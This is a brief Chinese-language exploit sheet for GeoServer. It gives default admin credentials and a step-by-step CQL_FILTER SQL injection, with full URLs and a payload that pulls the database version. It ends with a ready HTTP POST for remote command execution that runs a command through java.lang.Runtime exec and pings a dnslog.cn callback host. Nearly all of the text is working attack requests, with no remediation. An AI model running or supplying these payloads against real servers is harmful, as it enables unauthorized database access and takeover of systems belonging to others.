geoserver漏洞

geoserver 漏洞

1.弱口令

user：admin
password：geoserver

2.sql注入

影响范围

GeoServer < 2.21.4
GeoServer < 2.22.2

漏洞复现

1、查看geoserver版本

/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage?6&filter=false

2、获取图层名

/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

选择一个<FeatureType>标签中的Name属性的值用作下一步所需

3、获取属性名

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=[: 图层名]&maxFeatures=1&outputFormat=json
例如:
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&maxFeatures=1&outputFormat=json

选择任意属性的properties中任一字段的值作下一步所需

4、SQL 注入获取当前数据库版本

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=[: 图层名]&CQL_FILTER=[: 过滤器]([: 属性名],%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true
例如:
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&CQL_FILTER=strStartsWith(name,%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true

3.命令执行

影响范围

GeoServer < 2.23.6

2.24.0 <= GeoServer < 2.24.4

2.25.0 <= GeoServer < 2.25.2

漏洞复现

POST /geoserver/wfs HTTP/1.1
Host: xxxx.com
Content-Type: application/xml
Content-Length: 339

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping y711vj.dnslog.cn -c 1")'>
 <wfs:Query typeNames='top:stop'/>
</wfs:GetPropertyValue>